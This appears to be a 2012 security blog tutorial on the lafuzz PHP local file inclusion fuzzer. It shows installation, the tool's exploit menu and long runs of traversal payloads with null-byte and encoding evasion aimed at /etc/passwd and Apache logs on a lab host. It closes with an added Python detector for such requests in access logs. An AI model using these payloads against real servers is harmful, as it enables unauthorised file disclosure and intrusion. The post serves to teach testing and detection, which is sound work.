PHP File Inclusion Vulnerabilities: lafuzz
Posted on 2012-8-29 02:00:46

This tool has a bypass feature:
Fuzz with nullbyte and other evasion techniques?(y or n):
Answer y to use the bypass techniques, n to skip them.
It just did not return any results.

Installation:
  root@Dis9Team:/pen/web# wget http://lafuzz.googlecode.com/files/lafuzz.1.5.py.zip
  --2012-08-18 00:34:27--  http://lafuzz.googlecode.com/files/lafuzz.1.5.py.zip
  Resolving lafuzz.googlecode.com... 173.194.72.82, 2404:6800:4008:c01::52
  Connecting to lafuzz.googlecode.com|173.194.72.82|:80... connected.
  HTTP request sent, awaiting response... 200 OK
  Length: 7192 (7.0K) [application/zip]
  Saving to: `lafuzz.1.5.py.zip.1'

  100%[====================================================================================>] 7,192       --.-K/s   in 0.1s

  2012-08-18 00:34:28 (63.6 KB/s) - `lafuzz.1.5.py.zip' saved [7192/7192]

  root@Dis9Team:/pen/web# unzip lafuzz.1.5.py.zip
Fuzzing

Start the tool and choose an option:

  root@Dis9Team:/pen/web# ./lafuzz.py

There are 12 options:

  [1]Fuzz for LFI and Directory Transveral
  [2]Traditional Local File Inclusion scan and dump
  [3]File Descriptor LFI scan
  [4]Exploit LFI via /proc/self/environment
  [5]Exploit LFI via File descriptor
  [6]Include known apache logs
  [7]Exploit LFI via Logfile
  [8]Use LFI_Sploit's LFI command shell
  [9]Use php:// to read file streams(allow_url_include must be on)
  [10]Custom step(../../)
  [11]Information
  [12]Exit
1. Fuzzing


  Please pick an option(1-12):1
  Site and uri to Fuzz: http://5.5.5.3/lif.php?file=
  Clearing old files before starting a new scan
  Clearing old files before starting a new scan
  Clearing old files before starting a new scan
  Old files removed, ready to start a new scan
  Fuzz with nullbyte and other evasion techniques?(y or n):
  ...
  Attempting to include: http://5.5.5.3/lif.php?file=..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc%u2215group%00.phtml
  Attempting to include: http://5.5.5.3/lif.php?file=..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc%u2215passwd%00.phtml
  Attempting to include: http://5.5.5.3/lif.php?file=..%255c%00.phtml
  Attempting to include: http://5.5.5.3/lif.php?file=.%5c../..%5c%00.phtml
  Attempting to include: http://5.5.5.3/lif.php?file=/..%c0%9v../%00.phtml
  Attempting to include: http://5.5.5.3/lif.php?file=/..%c0%af../%00.phtml
  Attempting to include: http://5.5.5.3/lif.php?file=/..%255c..%255c%00.phtml
  Attempting to include: http://5.5.5.3/lif.php?file=/..%c0%af..//..%c0%af..//..%c0%af../%00.phtml
  Attempting to include: http://5.5.5.3/lif.php?file=/..%255c..%255c/..%255c..%255c/..%255c..%255c%00.phtml
  Attempting to include: http://5.5.5.3/lif.php?file=..%255c%00.phtml
  Attempting to include: http://5.5.5.3/lif.php?file=.%5c../..%5c/..%c0%9v../%00.phtml
  Attempting to include: http://5.5.5.3/lif.php?file=..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216etc%u2216passwd%00.phtml
  ....
2. Local file scan


  Please pick an option(1-12):2
  Site and uri to attack?: http://5.5.5.3/lif.php?file=
  cleaning up old files before starting a scan
  Clearing old files before starting a new scan
  Ready to start a new scan..
  Use a nullbyte(y or n):n
  ......
  Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../etc/passwd
  .......
  root@Dis9Team:/pen/web#
3. Apache log scan


  Please pick an option(1-12):6
  Site and uri to attack?: http://5.5.5.3/lif.php?file=
  Cleaning up old html files
  Clearing old files before starting a new scan
  Old files removed, ready to start a new scan
  Use a nullbyte(y or n):n
  Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../apache/logs/error.log
  Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../apache/logs/access.log
  Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../apache/logs/error.log
  Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../apache/logs/access.log
  Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../apache/logs/error.log
  Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../apache/logs/access.log
  Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../etc/httpd/logs/acces_log
  Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../etc/httpd/logs/acces.log
  Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../etc/httpd/logs/error_log
  Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../etc/httpd/logs/error.log
  Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../var/www/logs/access_log
  Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../var/www/logs/access.log
  Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../usr/local/apache/logs/access_log
  Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../usr/local/apache/logs/access.log
  Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../var/log/apache/access_log
  Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../var/log/apache2/access_log
  Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../var/log/apache/access.log
  Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../var/log/apache2/access.log
  Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../var/log/access_log
  Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../var/log/access.log
  Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../var/www/logs/error_log
  Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../var/www/logs/error.log
  Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../usr/local/apache/logs/error_log
  Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../usr/local/apache/logs/error.log
  Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../var/log/apache/error_log
  Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../var/log/apache2/error_log
  Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../var/log/apache/error.log
  Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../var/log/apache2/error.log
  Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../var/log/error_log
  Attempting to include: http://5.5.5.3/lif.php?file=../../../../../../../../var/log/error.log
  root@Dis9Team:/pen/web#




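Only after playing a thousand tunes does one understand music; only after examining a thousand swords does one know a blade.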
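
Seen from the server side, the requests in the fuzzing output above stand out in an access log once the encoding layers (%uXXXX, %25xx, %c0%af, %00) are undone. The following is an added detection example, not part of the original post or of lafuzz; the log lines are constructed, and the names normalise, classify and scan are this example's own.

```python
import re
from urllib.parse import unquote

REQ = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
U_ESC = re.compile(r"%u([0-9a-fA-F]{4})")   # non-standard %uXXXX escapes
# Slash look-alikes (U+2215, U+2216) and backslash all fold to "/"
FOLD = str.maketrans({"\u2215": "/", "\u2216": "/", "\\": "/"})
CHECKS = {"null-byte": r"%00", "double-encoding": r"%25[0-9a-f]{2}",
          "unicode-escape": r"%u[0-9a-f]{4}", "overlong-utf8": r"%c0%"}

def normalise(value, rounds=3):
    """Undo the encodings layer by layer so a hidden '../' becomes visible."""
    for _ in range(rounds):
        step = U_ESC.sub(lambda m: chr(int(m.group(1), 16)), value)
        step = re.sub(r"%c0%af", "/", step, flags=re.I)  # overlong UTF-8 "/"
        step = unquote(step, errors="replace").translate(FOLD)
        if step == value:
            break
        value = step
    return value

def classify(line):
    """Return the set of findings for one access-log line."""
    m = REQ.search(line)
    if not m or "?" not in m.group(1):
        return set()
    query = m.group(1).split("?", 1)[1]
    found = {name for name, rx in CHECKS.items() if re.search(rx, query, re.I)}
    if re.search(r"(^|[/=])\.\.(/|$)", normalise(query)):
        found.add("traversal")
    return found

def scan(lines):
    """Keep only the lines with at least one finding."""
    return [(ln, sorted(f)) for ln in lines if (f := classify(ln))]

# Constructed sample log lines (documentation address 192.0.2.10)
PRE = '192.0.2.10 - - [18/Aug/2012:00:40:01 +0000] "GET /lif.php?file='
SAMPLE = [PRE + p + ' HTTP/1.1" 200 512' for p in (
    "..%u2215..%u2215etc%u2215passwd%00.phtml",
    "/..%255c..%255c%00.phtml",
    "/..%c0%af../%00.phtml",
    "../../../../etc/passwd",
    "news.php",
)]

if __name__ == "__main__":
    for line, findings in scan(SAMPLE):
        print(findings, line.split('"')[1])
```

The encoding findings are worth alerting on even when no traversal is recovered, since ordinary clients do not send %00, %uXXXX or double-encoded separators in a file parameter.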
